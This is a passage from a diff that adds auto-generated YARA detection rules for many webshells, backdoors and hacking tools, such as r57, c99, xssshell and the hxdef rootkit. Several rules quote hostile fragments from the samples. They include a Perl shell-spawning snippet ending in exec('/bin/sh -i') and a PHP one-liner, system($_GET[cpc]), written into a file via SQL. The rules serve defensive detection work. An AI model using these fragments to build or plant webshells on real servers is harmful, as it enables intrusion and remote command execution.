+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+	condition:
+		all of them
+}
+rule r57shell {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+	condition:
+		all of them
+}
+rule bdcli100 {
+	meta:
+		description = "Webshells Auto-generated - file bdcli100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b12163ac53789fb4f62e4f17a8c2e028"
+	strings:
+		$s5 = "unable to connect to "
+		$s8 = "backdoor is corrupted on "
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005Red {
+	meta:
+		description = "Webshells Auto-generated - file 2005Red.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+	strings:
+		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X2 {
+	meta:
+		description = "Webshells Auto-generated - file 2006X2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cc5bf9fc56d404ebbc492855393d7620"
+	strings:
+		$s2 = "Powered By "
+		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+	condition:
+		all of them
+}
+rule rdrbs084 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs084.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ed30327b255816bdd7590bf891aa0020"
+	strings:
+		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
+		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+	condition:
+		all of them
+}
+rule HYTop_CaseSwitch_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8bf667ee9e21366bc0bd3491cb614f41"
+	strings:
+		$s1 = "MSComDlg.CommonDialog"
+		$s2 = "CommonDialog1"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s5 = "EVENT_SINK_AddRef"
+		$s6 = "By Marcos"
+		$s7 = "EVENT_SINK_QueryInterface"
+		$s8 = "MethCallEngine"
+	condition:
+		all of them
+}
+rule eBayId_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0412b1e37f41ea0d002e4ed11608905f"
+	strings:
+		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+	condition:
+		all of them
+}
+rule FSO_s_phvayv {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+	condition:
+		all of them
+}
+rule byshell063_ntboot {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "Dumping Description to Registry..."
+		$s3 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule FSO_s_casus15_2 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s0 = "copy ( $dosya_gonder"
+	condition:
+		all of them
+}
+rule installer {
+	meta:
+		description = "Webshells Auto-generated - file installer.cmd"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a507919ae701cf7e42fa441d3ad95f8f"
+	strings:
+		$s0 = "Restore Old Vanquish"
+		$s4 = "ReInstall Vanquish"
+	condition:
+		all of them
+}
+rule uploader {
+	meta:
+		description = "Webshells Auto-generated - file uploader.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b9a9aab319964351b46bd5fc9d6246a8"
+	strings:
+		$s0 = "move_uploaded_file($userfile, \"entrika.php\"); "
+	condition:
+		all of them
+}
+rule FSO_s_remview_2 {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s0 = "<xmp>$out</"
+		$s1 = ".mm(\"Eval PHP code\")."
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_r57 {
+	meta:
+		description = "Webshells Auto-generated - file r57.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "903908b77a266b855262cdbce81c3f72"
+	strings:
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X {
+	meta:
+		description = "Webshells Auto-generated - file 2006X.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+	strings:
+		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+	condition:
+		all of them
+}
+rule FSO_s_phvayv_2 {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+	condition:
+		all of them
+}
+rule elmaliseker {
+	meta:
+		description = "Webshells Auto-generated - file elmaliseker.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ccf48af0c8c09bbd038e610a49c9862e"
+	strings:
+		$s0 = "javascript:Command('Download'"
+		$s5 = "zombie_array=array("
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_resolve {
+	meta:
+		description = "Webshells Auto-generated - file resolve.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "69bf9aa296238610a0e05f99b5540297"
+	strings:
+		$s0 = "3^n6B(Ed3"
+		$s1 = "^uldn'Vt(x"
+		$s2 = "\\= uPKfp"
+		$s3 = "'r.axV<ad"
+		$s4 = "p,modoi$=sr("
+		$s5 = "DiamondC8S t"
+		$s6 = "`lQ9fX<ZvJW"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+	condition:
+		all of them
+}
+rule FSO_s_tool {
+	meta:
+		description = "Webshells Auto-generated - file tool.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a1e1e889fdd974a130a6a767b42655b"
+	strings:
+		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+	strings:
+		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+	condition:
+		all of them
+}
+rule byloader {
+	meta:
+		description = "Webshells Auto-generated - file byloader.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f0d6dc26055653f5844ded906ce52df"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "NTFS Disk Driver Checking Service"
+		$s3 = "Dumping Description to Registry..."
+		$s4 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_Fport {
+	meta:
+		description = "Webshells Auto-generated - file Fport.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
+	strings:
+		$s4 = "Copyright 2000 by Foundstone, Inc."
+		$s5 = "You must have administrator privileges to run fport - exiting..."
+	condition:
+		all of them
+}
+rule BackDooR__fr_ {
+	meta:
+		description = "Webshells Auto-generated - file BackDooR (fr).php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a79cac2cf86e073a832aaf29a664f4be"
+	strings:
+		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+	condition:
+		all of them
+}
+rule FSO_s_ntdaddy {
+	meta:
+		description = "Webshells Auto-generated - file ntdaddy.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+	strings:
+		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+	condition:
+		all of them
+}
+rule nstview_nstview {
+	meta:
+		description = "Webshells Auto-generated - file nstview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3871888a0c1ac4270104918231029a56"
+	strings:
+		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_upload {
+	meta:
+		description = "Webshells Auto-generated - file upload.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b09852bda534627949f0259828c967de"
+	strings:
+		$s0 = "<!-- PageUpload Below -->"
+	condition:
+		all of them
+}
+rule PasswordReminder {
+	meta:
+		description = "Webshells Auto-generated - file PasswordReminder.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+	strings:
+		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+	condition:
+		all of them
+}
+rule Pack_InjectT {
+	meta:
+		description = "Webshells Auto-generated - file InjectT.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "983b74ccd57f6195a0584cdfb27d55e8"
+	strings:
+		$s3 = "ail To Open Registry"
+		$s4 = "32fDssignim"
+		$s5 = "vide Internet S"
+		$s6 = "d]Software\\M"
+		$s7 = "TInject.Dll"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp_2 {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s2 = " Then Response.Write \""
+		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+	condition:
+		all of them
+}
+rule FSO_s_c99 {
+	meta:
+		description = "Webshells Auto-generated - file c99.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f9ba02eb081bba2b2434c603af454d0"
+	strings:
+		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+	condition:
+		all of them
+}
+rule rknt_zip_Folder_RkNT {
+	meta:
+		description = "Webshells Auto-generated - file RkNT.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f97386dfde148942b7584aeb6512b85"
+	strings:
+		$s0 = "PathStripPathA"
+		$s1 = "`cLGet!Addr%"
+		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s3 = "oQToOemBuff* <="
+		$s4 = "ionCdunAsw[Us'"
+		$s6 = "CreateProcessW: %S"
+		$s7 = "ImageDirectoryEntryToData"
+	condition:
+		all of them
+}
+rule dbgntboot {
+	meta:
+		description = "Webshells Auto-generated - file dbgntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "4d87543d4d7f73c1529c9f8066b475ab"
+	strings:
+		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+		$s3 = "sth junk the M$ Wind0wZ retur"
+	condition:
+		all of them
+}
+rule PHP_shell {
+	meta:
+		description = "Webshells Auto-generated - file shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+	strings:
+		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+	condition:
+		all of them
+}
+rule hxdef100 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "55cc1769cef44910bd91b7b73dee1f6c"
+	strings:
+		$s0 = "RtlAnsiStringToUnicodeString"
+		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+	condition:
+		all of them
+}
+rule rdrbs100 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7c752bcd6da796d80a6830c61a632bff"
+	strings:
+		$s3 = "Server address must be IP in A.B.C.D format."
+		$s4 = " mapped ports in the list. Currently "
+	condition:
+		all of them
+}
+rule Mithril_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "017191562d72ab0ca551eb89256650bd"
+	strings:
+		$s0 = "OpenProcess error!"
+		$s1 = "WriteProcessMemory error!"
+		$s4 = "GetProcAddress error!"
+		$s5 = "HHt`HHt\\"
+		$s6 = "Cmaudi0"
+		$s7 = "CreateRemoteThread error!"
+		$s8 = "Kernel32"
+		$s9 = "VirtualAllocEx error!"
+	condition:
+		all of them
+}
+rule hxdef100_2 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+	strings:
+		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+	condition:
+		all of them
+}
+rule Release_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "76a59fc3242a2819307bb9d593bef2e0"
+	strings:
+		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+		$s1 = "0 0&00060K0R0X0f0l0q0w0"
+		$s2 = ": :$:(:,:0:4:8:D:`=d="
+		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
+		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
+		$s7 = "<.<I<d<h<l<p<t<x<|<"
+		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
+		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+	condition:
+		all of them
+}
+rule webadmin {
+	meta:
+		description = "Webshells Auto-generated - file webadmin.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a90de401b30e5b590362ba2dde30937"
+	strings:
+		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+	condition:
+		all of them
+}
+rule commands {
+	meta:
+		description = "Webshells Auto-generated - file commands.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "174486fe844cb388e2ae3494ac2d1ec2"
+	strings:
+		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+	condition:
+		all of them
+}
+rule hkdoordll {
+	meta:
+		description = "Webshells Auto-generated - file hkdoordll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b715c009d47686c0e62d0981efce2552"
+	strings:
+		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+	condition:
+		all of them
+}
+rule r57shell_2 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s3 = "syspath"
+		$s4 = "\\Mithril"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule dbgiis6cli {
+	meta:
+		description = "Webshells Auto-generated - file dbgiis6cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3044dceb632b636563f66fee3aaaf8f3"
+	strings:
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+		$s5 = "###command:(NO more than 100 bytes!)"
+	condition:
+		all of them
+}
+rule remview_2003_04_22 {
+	meta:
+		description = "Webshells Auto-generated - file remview_2003_04_22.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17d3e4e39fbca857344a7650f7ea55e3"
+	strings:
+		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
+	condition:
+		all of them
+}
+rule FSO_s_test {
+	meta:
+		description = "Webshells Auto-generated - file test.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "82cf7b48da8286e644f575b039a99c26"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
+		$s2 = "fwrite ($fp, \"$yazi\");"
+	condition:
+		all of them
+}
+rule Debug_cress {
+	meta:
+		description = "Webshells Auto-generated - file cress.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "36a416186fe010574c9be68002a7286a"
+	strings:
+		$s0 = "\\Mithril "
+		$s4 = "Mithril.exe"
+	condition:
+		all of them
+}
+rule webshell {
+	meta:
+		description = "Webshells Auto-generated - file webshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f2f8c02921f29368234bfb4d4622ad19"
+	strings:
+		$s0 = "RhViRYOzz"
+		$s1 = "d\\O!jWW"
+		$s2 = "bc!jWW"
+		$s3 = "0W[&{l"
+		$s4 = "[INhQ@\\"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule thelast_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cceff6dc247aaa25512bad22120a14b4"
+	strings:
+		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+	condition:
+		all of them
+}
+rule adjustcr {
+	meta:
+		description = "Webshells Auto-generated - file adjustcr.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17037fa684ef4c90a25ec5674dac2eb6"
+	strings:
+		$s0 = "$Info: This file is packed with the UPX executable packer $"
+		$s2 = "$License: NRV for UPX is distributed under special license $"
+		$s6 = "AdjustCR Carr"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_xIShell {
+	meta:
+		description = "Webshells Auto-generated - file xIShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "997c8437c0621b4b753a546a53a88674"
+	strings:
+		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+	condition:
+		all of them
+}
+rule HYTop_AppPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+	condition:
+		all of them
+}
+rule xssshell {
+	meta:
+		description = "Webshells Auto-generated - file xssshell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+	strings:
+		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_usr {
+	meta:
+		description = "Webshells Auto-generated - file usr.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ade3357520325af50c9098dc8a21a024"
+	strings:
+		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+	condition:
+		all of them
+}
+rule xssshell_db {
+	meta:
+		description = "Webshells Auto-generated - file db.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cb62e2ec40addd4b9930a9e270f5b318"
+	strings:
+		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+	condition:
+		all of them
+}
+rule PHP_sh {
+	meta:
+		description = "Webshells Auto-generated - file sh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1e9e879d49eb0634871e9b36f99fe528"
+	strings:
+		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+	condition:
+		all of them
+}
+rule xssshell_default {
+	meta:
+		description = "Webshells Auto-generated - file default.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d156782ae5e0b3724de3227b42fcaf2f"
+	strings:
+		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+	condition:
+		all of them
+}
+rule EditServer_2 {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+	strings:
+		$s0 = "@HOTMAIL.COM"
+		$s1 = "Press Any Ke"
+		$s3 = "glish MenuZ"
+	condition:
+		all of them
+}
+rule by064cli {
+	meta:
+		description = "Webshells Auto-generated - file by064cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "10e0dff366968b770ae929505d2a9885"
+	strings:
+		$s7 = "packet dropped,redirecting"
+		$s9 = "input the password(the default one is 'by')"
+	condition:
+		all of them
+}
+rule Mithril_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+	strings:
+		$s0 = "please enter the password:"
+		$s3 = "\\dllTest.pdb"
+	condition:
+		all of them
+}
+rule peek_a_boo {
+	meta:
+		description = "Webshells Auto-generated - file peek-a-boo.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aca339f60d41fdcba83773be5d646776"
+	strings:
+		$s0 = "__vbaHresultCheckObj"
+		$s1 = "\\VB\\VB5.OLB"
+		$s2 = "capGetDriverDescriptionA"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s8 = "__vbaErrorOverflow"
+	condition:
+		all of them
+}
+rule fmlibraryv3 {
+	meta:
+		description = "Webshells Auto-generated - file fmlibraryv3.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c34c248fed6d5a20d8203924a2088acc"
+	strings:
+		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+	condition:
+		all of them
+}
+rule Debug_dllTest_2 {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s4 = "\\Debug\\dllTest.pdb"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule connector {
+	meta:
+		description = "Webshells Auto-generated - file connector.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3ba1827fca7be37c8296cd60be9dc884"
+	strings:
+		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
+		$s4 = "Add UNIQUE ID for victims / zombies"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_HideRun {
+	meta:
+		description = "Webshells Auto-generated - file HideRun.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45436d9bfd8ff94b71eeaeb280025afe"
+	strings:
+		$s0 = "Usage -- hiderun [AppName]"
+		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+	condition:
+		all of them
+}
+rule regshell {
+	meta:
+		description = "Webshells Auto-generated - file regshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
+	strings:
+		$s0 = "Changes the base hive to HKEY_CURRENT_USER."
+		$s4 = "Displays a list of values and sub-keys in a registry Hive."
+		$s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
+	condition:
+		all of them
+}
+rule PHP_Shell_v1_7 {
+	meta:
+		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b5978501c7112584532b4ca6fb77cba5"
+	strings:
+		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+	condition:
+		all of them
+}
+rule xssshell_save {
+	meta:
+		description = "Webshells Auto-generated - file save.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "865da1b3974e940936fe38e8e1964980"
+	strings:
+		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+		$s5 = "VictimID = fm_NStr(Victims(i))"
+	condition:
+		all of them
+}
+rule screencap {
+	meta:
+		description = "Webshells Auto-generated - file screencap.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "51139091dea7a9418a50f2712ea72aa6"
+	strings:
+		$s0 = "GetDIBColorTable"
+		$s1 = "Screen.bmp"
+		$s2 = "CreateDCA"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj_2 {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_zxrecv {
+	meta:
+		description = "Webshells Auto-generated - file zxrecv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+	strings:
+		$s0 = "RyFlushBuff"
+		$s1 = "teToWideChar^FiYP"
+		$s2 = "mdesc+8F D"
+		$s3 = "\\von76std"
+		$s4 = "5pur+virtul"
+		$s5 = "- Kablto io"
+		$s6 = "ac#f{lowi8a"
+	condition:
+		all of them
+}
+rule FSO_s_ajan {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s4 = "entrika.write \"BinaryStream.SaveToFile"
+	condition:
+		all of them
+}
+rule c99shell {
+	meta:
